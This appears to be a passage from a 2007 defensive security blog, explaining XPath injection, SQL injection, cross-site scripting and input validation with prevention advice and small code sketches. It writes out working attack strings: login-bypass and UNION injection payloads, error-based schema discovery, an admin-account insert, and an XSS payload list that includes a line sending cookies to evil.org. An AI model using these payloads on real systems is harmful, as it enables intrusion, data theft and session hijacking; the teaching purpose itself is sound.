XPathExpression xexpr = custnav.Compile("string(//Customers/Customer[CLogIn/text()='" + TextBox1.Text + "' and Pwd/text()='" + TextBox2.Text + "']/SSN/text())");
string ssn = Convert.ToString(custnav.Evaluate(xexpr));
if (ssn != "")
{
    // some logic using ssn or return ssn
}
else
{
    // return with error message
}

In the above sample code, the application lets its users retrieve and operate on an SSN based on the unvalidated values they supply. This code is vulnerable to XPath injection! If a user enters legitimate values like Malapati and Malapati2020 in the login and password fields respectively, then the query will look like this:

//Customers/Customer[CLogIn/text()='Malapati' and Pwd/text()='Malapati2020']/SSN/text()

This works well. But suppose a user/attacker enters the following value in the text box provided for the customer login and leaves the password field blank. (XPath operator names are case-sensitive, so or must be written in lower case.)
' or 1=1 or 'a'='a

Now, what will be the actual XPath query?

//Customers/Customer[CLogIn/text()='' or 1=1 or 'a'='a' and Pwd/text()='']/SSN/text()

The predicate CLogIn/text()='' or 1=1 or 'a'='a' and Pwd/text()='' is evaluated as:
(CLogIn/text()='' or 1=1) or ('a'='a' and Pwd/text()='') because the logical operator and has higher precedence than or. So if either the first or the second group is true, the whole predicate evaluates to true. Here the attacker's input contains 1=1, which is always true, so the first group is always true and every Customer node matches. The query is now equivalent to //Customers/Customer/SSN/text(), and because string() returns the value of the first node in a node-set, the application gets back the SSN of the first customer record.
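The grouping described above can be checked with a small model. This is only a sketch in Python rather than XPath, and the function name predicate_matches and the sample pairs are made up for illustration; it relies solely on the fact that `and` binds tighter than `or` in both languages.

```python
def predicate_matches(clogin: str, pwd: str) -> bool:
    """Model of the injected predicate for a single Customer node.

    Mirrors: CLogIn = '' or 1 = 1 or 'a' = 'a' and Pwd = ''
    Python, like XPath, evaluates `and` before `or`.
    """
    return clogin == "" or 1 == 1 or "a" == "a" and pwd == ""


# Hypothetical (login, password) pairs standing in for Customer nodes.
customers = [("Malapati", "Malapati2020"), ("Vijaya", "Vigav1010")]

# Every node satisfies the predicate, whatever values it stores.
matches = [predicate_matches(login, pwd) for login, pwd in customers]
print(matches)
```

Because the middle term is always true, the stored login and password never influence the result, which is exactly why the filter stops filtering.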

Countermeasures / Preventions:

XPath injection can be prevented in much the same way as SQL injection, since the two attacks are so similar. Most of these preventive measures also apply to other typical code injection attacks.
Input Validation: This is one of the best measures to defend applications from XPath injection attacks. The developer has to ensure that the application accepts only legitimate input. Please refer to my previous posting on Input Validation for more details.
Parameterization: Use parameterized queries to prevent XPath injection. In a parameterized query, the expression is precompiled and user input is passed as parameter values rather than being spliced into the expression text. For example:
//Customers/Customer[CLogIn/text() = $login and Pwd/text() = $password]/SSN/text()

Please refer to the Mitigating XPath Injection Attacks in .NET for more details.
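The idea behind parameterization is that user input is only ever treated as data, never as part of the expression. Here is a minimal sketch of that idea in Python. Note the swap: Python's standard xml.etree.ElementTree does not support XPath variables such as $login, so this sketch uses a constant path and compares the values in code instead. The function name find_ssn and the trimmed sample data are assumptions for illustration, not the .NET approach from the linked article.

```python
import xml.etree.ElementTree as ET

# Trimmed, hypothetical version of CustProfile.xml for the sketch.
SAMPLE_XML = """<Customers>
  <Customer>
    <CLogIn>Malapati</CLogIn>
    <Pwd>Malapati2020</Pwd>
    <SSN>xxxxxxxxxxxx</SSN>
  </Customer>
  <Customer>
    <CLogIn>Vijaya</CLogIn>
    <Pwd>Vigav1010</Pwd>
    <SSN>yyyyyyyyyyyy</SSN>
  </Customer>
</Customers>"""


def find_ssn(root, login, password):
    """Return the SSN for matching credentials, or None."""
    # The path is a constant; user input is only compared as plain data.
    for customer in root.findall("./Customer"):
        if (customer.findtext("CLogIn") == login
                and customer.findtext("Pwd") == password):
            return customer.findtext("SSN")
    return None


root = ET.fromstring(SAMPLE_XML)
print(find_ssn(root, "Malapati", "Malapati2020"))
print(find_ssn(root, "' or 1=1 or 'a'='a", ""))
```

The injection string from the example is now just an odd-looking login name that matches no customer, so the second call finds nothing.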

Friday, September 21, 2007

An Overview of SQL Injection

SQL Injection:

A SQL injection attack exploits vulnerabilities in input validation to run arbitrary commands in the database. Your code is vulnerable to SQL injection wherever it uses input parameters to construct SQL statements. The attack occurs when untrusted, user-controllable input can modify the logic of a SQL query in unexpected ways. It can also occur if your code calls stored procedures with strings that contain unfiltered or unsanitized user input.

Impact:

SQL injection can result in unauthorized access to, modification of, or destruction of data. Using a SQL injection attack, the attacker can execute arbitrary commands in the database. If a vulnerable application also uses an over-privileged account to connect to the database, the attacker may be able to run operating system commands through the database server and potentially compromise other servers, in addition to being able to retrieve, manipulate, and destroy the data that exists in the databases.

Background:

Web applications generally allow legitimate users to submit data to and retrieve data from a database over the Internet using their browser. This data may be anything: user information, company statistics, product details, customer details, vendor details, payment information, financial information, etc. These applications are vulnerable to SQL injection if user-controllable input is used directly to build the SQL statements sent to the backend, without adequate validation.

In Detail, with a few examples:

The simplest SQL injection technique is bypassing login forms. Consider the following web application code used in a login form:

Query = "SELECT Uname FROM Users WHERE Uname = '" & txtUsername & "' AND Pwd = '" & txtPassword & "'"

strCheck = GetDbaseResult(Query)
If strCheck = "" Then
    boolAuthenticated = False
Else
    boolAuthenticated = True
End If

With this logic, the GetDbaseResult method searches the Users table and returns the user name if a row exists with the user name and password supplied by the user. This user name is stored in the variable strCheck. If no row in the Users table matches the supplied data, strCheck will be empty and the user will not be authenticated.
The code above constructs the SQL statement dynamically from user input (the text box values of the login form) without adequate validation or sanitization. This makes it vulnerable to SQL injection, and an attacker can easily bypass the authentication logic in the following way.

The attacker enters ' OR ''=' in the text box provided for the user name and ' OR ''=' in the text box provided for the password.

Now the final query that is going to be executed will look like this:

SELECT Uname FROM Users WHERE Uname = '' OR ''='' AND Pwd = '' OR ''=''

The WHERE clause of this statement is always true, because it ends in OR ''=''. Since every row now satisfies the WHERE clause, the query returns the user name from the first row in the table that is searched. That user name is passed to strCheck, which makes the check succeed. Oops, our authentication mechanism is bypassed!

Alternatively, the attacker can just enter ' OR 'a' = 'a';-- in the text box provided for the user name to bypass authentication.
Or he can create a login for himself by inserting a row into the Users table with the following input:

'; insert into users values('Attacker', 'Password', 'Admin')--
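To see the bypass happen, here is a small sketch that reproduces the concatenated login query against an in-memory SQLite database. SQLite, the function name login_vulnerable, and the sample user row are all assumptions made for the demonstration; the original code targets a different backend, but the string-building flaw is the same.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (Uname TEXT, Pwd TEXT)")
conn.execute("INSERT INTO Users VALUES ('alice', 's3cret')")


def login_vulnerable(username, password):
    """Return the matching user name, or '' if no row matches."""
    # VULNERABLE: mirrors the concatenated query from the login form.
    query = ("SELECT Uname FROM Users WHERE Uname = '" + username +
             "' AND Pwd = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else ""


payload = "' OR ''='"
wrong_password = login_vulnerable("alice", "wrong")
bypassed = login_vulnerable(payload, payload)
print(repr(wrong_password), repr(bypassed))
```

A wrong password is rejected as expected, yet the payload gets back a real user name without knowing any credentials.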

Direct Injection vulnerabilities:

In a direct injection, whatever argument you submit is used in the SQL query without any modification. Directly injected values can be either a numeric value used in a WHERE clause, as follows...

Query = "SELECT CustNo, CustName, Location FROM Customers WHERE CustNo = " & txtCustNumber

...or the argument of a SQL keyword, such as a table or column name:

Query = "SELECT CustNo, CustName, Location FROM Customers ORDER BY " & txtColumnName

Quoted Injection vulnerabilities:

In a quoted injection, whatever argument the user submits has a quote prepended and appended to it by the application, as follows...

Query = "SELECT CustNo, CustName, Location FROM Customers WHERE CustName = '" & txtCustName & "'"

To exploit a quoted injection vulnerability, the attacker must use an injection string that contains a single quote before any SQL keyword. The attacker can also use special symbols like ";--" to comment out the rest of the logic. Everything after "--" is treated as a comment in SQL Server; the attacker uses the appropriate symbols for whichever backend the application uses. The attacker can learn these details by reverse-engineering parts of the vulnerable web application's SQL query from the returned error messages.

There are many ways to inject SQL code to get unintended results from the application. For example, the attacker can extend a WHERE clause by injecting a UNION SELECT, making the database server return records other than those intended. UNION allows multiple SELECT queries to be combined in one statement, provided each SELECT returns the same number of columns with compatible types.

SELECT CustNo, CustName FROM Customers WHERE CustNo = -1 UNION ALL SELECT ProdCode, ProductName FROM Products WHERE 1 = 1

The above statement returns the rows from the first query and the second query together. The keyword ALL keeps duplicate rows, which a plain UNION would remove as if by SELECT DISTINCT.
The actual query within the code looks like this:

Query = "SELECT CustNo, CustName FROM Customers WHERE CustNo = " & txtCustNo

The attacker simply injected the following input to get the details of products:

-1 UNION ALL SELECT ProdCode, ProductName FROM Products WHERE 1 = 1

The constructed query will not return any records from the first table, since it won't find a record with a customer number of negative one (assuming that there are no negative customer numbers), but it will return all records from the second table, which was injected into the actual query.
Most databases store metadata in system tables; SQL Server, for example, uses tables named sysobjects, syscolumns, sysindexes, and so on. This means that an attacker could use these system tables to grab schema information for a database to assist him in the further compromise of the database. For example, the following input might be used to reveal the names of the user tables in the database:

' UNION SELECT id, name, '', 0 FROM sysobjects WHERE xtype ='U' --
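The UNION technique can be reproduced in a few lines. The sketch below assumes an in-memory SQLite database with made-up Customers and Products rows, and a hypothetical lookup_customer function that appends the input to the query just as the code above does. Note that the injected SELECT returns two columns here, because a UNION requires both sides to return the same number of columns.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Customers (CustNo INTEGER, CustName TEXT);
    CREATE TABLE Products (ProdCode INTEGER, ProductName TEXT, Price REAL);
    INSERT INTO Customers VALUES (1, 'Acme');
    INSERT INTO Products VALUES (100, 'Widget', 9.99);
    INSERT INTO Products VALUES (101, 'Gadget', 19.99);
""")


def lookup_customer(cust_no_text):
    # VULNERABLE: the "numeric" input is appended without any validation.
    query = ("SELECT CustNo, CustName FROM Customers WHERE CustNo = "
             + cust_no_text)
    return conn.execute(query).fetchall()


injected = "-1 UNION ALL SELECT ProdCode, ProductName FROM Products WHERE 1 = 1"
normal_rows = lookup_customer("1")
leaked_rows = lookup_customer(injected)
print(normal_rows)
print(leaked_rows)
```

The first call returns the single customer row, while the second returns no customers at all and every row of the Products table instead.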

How attacker gathers information:

In order to manipulate the data in the database, the attacker has to determine the structure of certain databases and tables. How does the attacker get this information?
If the application returns detailed error messages, the attacker can determine the entire structure of the database and read any value that can be read by the account the application uses to connect to the database server.
Suppose the attacker wants to establish the names of the tables that the query operates on, and the names of the fields. For this, he uses the 'having' clause of the 'select' statement, entering malformed input like the following into the text box or query string:

' having 'a'='a'--
or
' having 1=1 --

This input produces an error saying Column 'XXXXXX' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. So now the attacker knows the first column name in the query. He can continue through the columns by introducing each field into a 'group by' clause, like below:

' group by XXXXX having 1=1-- (Here XXXXX is the column name retrieved from the error message)

This input then produces an error message saying Column 'YYYYY' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Now the attacker knows the second column name of the query and moves on. Once he knows all the columns, he can determine the type of each column by provoking a 'type conversion' error message with the help of aggregate functions, like below:

' union select sum(XXXX) from TableName --

This input reveals the data type of the column by returning an error message like the sum or average aggregate operation cannot take a varchar data type as an argument, which tells him that the 'XXXX' field has type 'varchar'. He can use this technique to approximately determine the type of any column of any table in the database. The attacker can take advantage of any error message that reveals information about the environment or the database.

What can the attacker do next?

Once an attacker has compromised or gained control of the database, he can use that access to obtain further control over the network. He can do things like the following, among others:

Use the xp_cmdshell extended stored procedure to run arbitrary operating system commands on the database server.
Use the 'bulk insert' statement to read any file on the server.
Use system stored procedures like sp_OACreate, sp_OAMethod and sp_OAGetProperty to create and drive ActiveX (OLE Automation) objects.
Use the xp_regread extended stored procedure to read registry keys, including the SAM (if the database server service is running as the local system account).
Create custom extended stored procedures to run exploit code on the database server from within the database server process.
Manipulate or drop data, and retrieve sensitive information.
Stop or disable required services, or even shut down the server.

Recommendations:

Avoid dynamic SQL; consider passing parameters to stored procedures instead. Parameters passed to a stored procedure are generally much safer than dynamic SQL.
Perform input validation on all inputs, constraining the input in terms of length, character set, and format, so that the application accepts only valid characters. Please refer to my post Assume all input is malicious until proven otherwise for more details on input validation.
Do not rely on client-side code to validate input, as it can be bypassed by attackers.
Use a white list approach to validate the inputs.
Along with input validation, consider sanitizing inputs so that they do not contain dangerous code, as a defense in depth strategy.
Limit database permissions and segregate users.
Lock down the server: run the database server service under a least privileged account, and use a least privileged account to connect to the database from the application.
Isolate the web server.
Display only generic error messages to the users of the application, implement proper error handling, and fail safely in case of any failure.

The above are a few methods to protect applications from SQL injection. Implement all of them, or a combination of several, to defend against SQL injection, but don't depend only on inadequate techniques like sanitizing or escaping a few characters such as single quotes. Attackers can easily bypass these, for example by using the Char function to build strings without typing any quote character (Char(0x63) yields the letter c).
At a minimum, it is better to use parameterized stored procedures instead of dynamic SQL, along with adequate server-side input validation, such as regular expressions with a white list approach, to prevent SQL injection.
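As a rough illustration of why parameters are safer than dynamic SQL, here is a sketch using Python's built-in sqlite3 module. SQLite has no stored procedures, so this shows a parameterized query rather than a parameterized stored procedure; the table contents and the login function are assumptions for the example, and the password is stored in plain text only to keep the sketch short.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (Uname TEXT, Pwd TEXT)")
conn.execute("INSERT INTO Users VALUES (?, ?)", ("alice", "s3cret"))


def login(username, password):
    """Return True only if a row matches both values exactly."""
    # The ? placeholders bind the input as values; it is never parsed as SQL.
    row = conn.execute(
        "SELECT Uname FROM Users WHERE Uname = ? AND Pwd = ?",
        (username, password),
    ).fetchone()
    return row is not None


print(login("alice", "s3cret"))
print(login("' OR ''='", "' OR ''='"))
```

With bound parameters, the classic bypass string is compared literally against the Uname and Pwd columns, so it matches nothing.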

Conclusion:

I believe that web application developers often simply do not think about "surprising and malicious inputs"; they generally focus on application functionality rather than security. Attackers and security people do think about them, so it is always good to follow security best practices while designing and developing applications in order to build robust and secure applications.

Tuesday, September 18, 2007

The Cause of Cross-Site Scripting

Cross-Site Scripting:

Cross-site scripting (also known as XSS or CSS) vulnerabilities occur whenever user input is passed back to the browser without adequate validation, sanitization or encoding. Put simply, XSS occurs when dynamically generated web pages display user input that is not properly validated, enabling an attacker to inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable page and execute the script on the machine of any user who views that page, in order to gather data from them. In general, XSS exploits enable attackers to take arbitrary actions on the vulnerable site on the victim's behalf. In the worst-case scenario, an attacker can use XSS to seize remote control of the victim's computer.

An attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Users may unintentionally execute scripts written by an attacker when they follow links from unknown sources in web pages, instant messages, e-mail messages, newsgroup postings, etc. The end user's browser has no way to know that the script should not be trusted, and will execute it as though it came from a trusted source.

The malicious script can access any cookies, session tokens, or other sensitive information retained by the end user's browser and used with that site. These scripts can even rewrite the content of the HTML page. Everything from account hijacking and changing of user settings to cookie theft/poisoning and false advertising is possible with XSS. Because the malicious scripts use the targeted site to hide their origins, the attacker has full access to the retrieved web page and may send data contained in the page back to their own server. Scripting tags that are most often used to embed malicious content include <script>, <object>, <applet>, <form> and <embed>. However, it is important to note that alternative "in-line" scripting elements, such as javascript:alert('Oops Hacked'), may also be used and are interpreted by the current generation of web browsers.

Attackers frequently use a variety of methods to encode the malicious portion of the tag to bypass filters and validation techniques that use a black list approach. There are hundreds of variants of these attacks, including versions that do not require any < > symbols at all. For example, if a web page uses the UTF-7 character encoding, several different strings will act as a '<' character and start an HTML tag. So, don't depend on a black list approach to validate user input, and don't depend only on escaping, filtering, or encoding a few malicious characters.

XSS attacks can generally be divided into two categories:

Persistent/Direct attacks: The injected code is permanently stored on the target server, such as in a database. The victim then retrieves the malicious script from the server when the browser requests the stored information.
Non-Persistent/Indirect attacks: The injected code is reflected off the web server, in any response that includes some or all of the input sent to the server as part of the request. The attacker supplies the victim with a URL or HTML form that contains the malicious script. The victim's browser passes the malicious script to the vulnerable site, which replays it to the victim's browser.
In both cases, the script is executed in the trust context of the vulnerable site.

For example:

A vulnerable site has a search page that accepts requests and then displays the results for the search criteria the user entered. If a user types "abcdefghxyz" as the search criteria, the server may return a message that the input is invalid or that No value is found for abcdefghxyz. This seems harmless. But suppose the user types in "<Script>alert('Oops Hacked');</Script>" and the server returns "No value is found for <Script>alert('Oops Hacked');</Script>" to the browser. If the user input is not encoded or validated, the client's web browser will interpret the script tags and execute the alert('Oops Hacked') function, resulting in a message box with the "Oops Hacked" message. If that happens, the page is probably susceptible to an XSS attack. This is a common method attackers use to find vulnerable sites.

Typical Payloads:

<img src="malicious.js">
<script>alert('hacked')</script>
<iframe src="malicious.js"> ... </iframe>
<script>document.write('<img src="http://evil.org/' + document.cookie + '">')</script>
<a href="javascript:…"> click-me </a>
<EMBED SRC="http://www.xsshacker.com/movies/porn.mov">
<A HREF="http://Originalsite.com/search.asp?criteria=<SCRIPT SRC='http://xsshackers.com/badscript.js'> </SCRIPT>"> Home </A>
<A HREF="" [event]='code'>Go</A>
<img src="&{alert('Oops Hacked')};">
http://Originalsite.com/search.asp?query=%26%7balert%28%27OopsHacked%27%29%7d%3b
<EMBED src="http://xsshackers.com/maliciousflash.swf" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100" height="100"> </EMBED>

Prevention:

The ideal defense against cross-site scripting employs a combination of input validation and output encoding. Use regular expressions to validate the input with a white list approach, allowing only an acceptable character set, type, format and length. Apply proper encoding before echoing user input back to the browser. Output encoding is useful only for defeating XSS attacks, whereas input validation can defeat many other attacks as well. Therefore, take advantage of both techniques, following the principle of defensive design.
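To make output encoding concrete, here is a minimal sketch using html.escape from Python's standard library on the search page message from the earlier example. The function name render_no_results is hypothetical, and this covers only the HTML body context; other contexts such as URLs or script blocks need their own encoders.

```python
import html


def render_no_results(search_term: str) -> str:
    # Encode on output so the browser treats the term as text, not markup.
    return "No value is found for " + html.escape(search_term, quote=True)


safe_message = render_no_results("<Script>alert('Oops Hacked');</Script>")
print(safe_message)
```

The angle brackets and quotes come out as character entities, so the browser displays the payload as text instead of running it.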

Microsoft released a free library called the AntiXss Library that makes output encoding more secure and supports more output contexts than just HTML. So, instead of using weak encoding methods use this library to protect your application from XSS. You can download AntiXss library from the below site:

http://www.microsoft.com/downloads/details.aspx?familyid=9a2b9c92-7ad9-496c-9a89-af08de2e5982&displaylang=en

Monday, September 17, 2007

Assume all input is malicious until proven otherwise

Input validation:

Input validation is the most important ingredient of a secure application. Most major security holes today result from input validation flaws. This is something you can fix only by writing secure code; no settings or firewalls can save you here.

Your application's user input is the attacker's primary weapon when targeting your application. Attacks such as buffer overflow, cross-site scripting, SQL injection, canonicalization, code injection, and numerous other denial of service and elevation of privilege attacks can exploit poor input validation. For example, non-validated input in the Hypertext Markup Language (HTML) output stream leads to cross-site scripting, non-validated input used to generate SQL queries leads to SQL injection, and the use of input file names, URLs, or user names for security decisions leads to canonicalization attacks.

Input is anything that isn't well known at compile time. Web applications receive input from various sources, for example, all data sent from the user or round-tripped by your application (postback data, view state, cookies, headers, query string parameters, and so forth) and back-end data (databases, configuration data, and other data sources). All that input data influences your request processing at some point.

If you make unfounded assumptions about the type, length, format, or range of input, your application is unlikely to be secure. The attacker can supply carefully crafted input that compromises your application.

Assume all input is malicious until proven otherwise, and apply a defense in depth strategy to input validation, taking particular precautions to make sure that input is validated whenever a trust boundary in your application is crossed. Your applications must ensure that input from query strings, form fields, and cookies is valid for the application. Consider all user input as possibly malicious, and sanitize for the context of the downstream code. Validate all input for known valid values and then reject all other input. Use regular expressions to validate input data.

You should also validate data coming from the database, treating it as another form of user input, especially if other applications write to the database. Input validation is not always necessary if the input is passed from a trusted source inside your trust boundary, but it should be considered mandatory if the input is passed from sources that are not trusted.

Proper input validation is one of your strongest measures of defense against today’s application attacks. Consider the following guidelines for input validation.

Assume all input is malicious: Input validation starts with a fundamental supposition that all input is malicious until proven otherwise. Whether input comes from a service, a file share, a user, or a database, validate your input if the source is outside your trust boundary.
Centralize your approach: Make your input validation strategy a core element of your application design. Consider a centralized approach to validation.
Do not rely on client-side validation: Server-side code should perform its own validation. Client-side validation can be easily bypassed. For example, a JavaScript check on a value entered by the user can be bypassed simply by disabling script in the browser.
Be careful with canonicalization issues: Data in canonical form is in its most standard or simplest form. Canonicalization is the process of converting data to its canonical form.
Constrain, reject, and sanitize your input: The preferred approach to validating input is to constrain what you allow from the beginning. Validate all input for known valid values and then reject all other input. Best way is to use regular expressions to validate input data.
Other Countermeasures (Defense in Depth approach):
In addition to the techniques discussed earlier, use other countermeasures for defense in depth, such as setting the correct character encoding, using the ASP.NET version 1.1 validateRequest option, and installing URLScan on your Web server.

Input Validation Techniques:

You can use a number of input validation techniques to validate data, but most of them can be categorized as either a white listing approach or a black listing approach. Some of the validation techniques are described below.

Black Listing: Developers often feel that black listing is the easiest approach to input validation, but in practice it is very hard to do well; you cannot predict what unexpected input might prove dangerous as new exploits are developed. How can you determine all the malicious characters? For example, to defend against cross-site scripting you may black list '<', '>' and a few more special characters, but these characters can be represented in many ways. So this approach is the least reliable. You can use it along with other validation techniques for defense in depth, but don't rely on it alone to validate input. The ASP.NET version 1.1 "validateRequest" feature mentioned above uses this technique.
White Listing: This is the preferred technique for input validation. White listing means defining a set of allowed characters and rejecting anything outside this set. It is exactly the opposite of black listing and is much more powerful because it allows only known-good characters, and it is easier to implement.
Data Type Conversion: It is always recommended to validate data for type, format, range, and length. The most fundamental input check is to make sure that the data is of the data type you are expecting. The built-in .NET value types, such as Int32 and DateTime, provide Parse and TryParse methods that create the corresponding data type from a string.
Regular Expressions: This is the right choice for validating data for format, type, range, and length all in a single shot; it is an incredibly powerful way to implement white listing and pattern matching of strings. The .NET Framework provides the System.Text.RegularExpressions namespace for this purpose.
XML Validation: Validating XML data against a schema is another white listing technique. You should know what to allow and expect; XML Schema is a powerful way to make sure XML documents comply with a certain format. The .NET Framework provides the System.Xml namespace for this purpose.
Along with the above, there are a few more techniques, such as sandboxing and integrity checking with hashing.
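The white listing, regular expression, and data type conversion techniques above can be combined in a few lines. The following is a minimal sketch in Python rather than .NET; the user name policy (3 to 20 letters, digits, or underscores), the customer number range, and both function names are assumptions chosen for illustration.

```python
import re

# Assumed policy for illustration: 3-20 letters, digits, or underscores.
USERNAME_PATTERN = re.compile(r"[A-Za-z0-9_]{3,20}")


def is_valid_username(value: str) -> bool:
    # fullmatch requires the entire string to fit the white list.
    return USERNAME_PATTERN.fullmatch(value) is not None


def parse_customer_number(value: str, lo: int = 1, hi: int = 999_999):
    """Return the number if it is an in-range integer, else None."""
    # Check format and length first, then convert, then check the range.
    if not re.fullmatch(r"[0-9]{1,6}", value):
        return None
    number = int(value)
    return number if lo <= number <= hi else None


print(is_valid_username("Malapati"))
print(is_valid_username("' OR ''='"))
print(parse_customer_number("42"))
print(parse_customer_number("-1 UNION ALL SELECT 1"))
```

Anything that does not fit the expected shape is rejected outright, so the injection strings from the earlier posts never reach a query.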

Summary:

While developing applications, always remember that the majority of application level attacks (approximately 80%) rely on maliciously formed input data and poor application input validation. Most Web application attacks require that malicious input is passed within HTTP requests. The general goal is either to coerce the application into performing unauthorized operations or to disrupt its normal operation. This is why thorough input validation is an essential countermeasure to many attacks and should be made a top priority when you develop Web pages. Take special care in this area to make sure that your validation strategy is sound and that all data that is processed from a non-trusted source is properly validated.

References:

There are several validation routines freely available at:

http://www.guidancelibrary.com/default.aspx/Home.RegExInputValCode

How To: Use Regular Expressions to Constrain Input in ASP.NET

http://msdn2.microsoft.com/en-us/library/ms998267.aspx

Security Guidelines: ASP.NET 2.0

http://msdn2.microsoft.com/en-us/library/ms998258.aspx
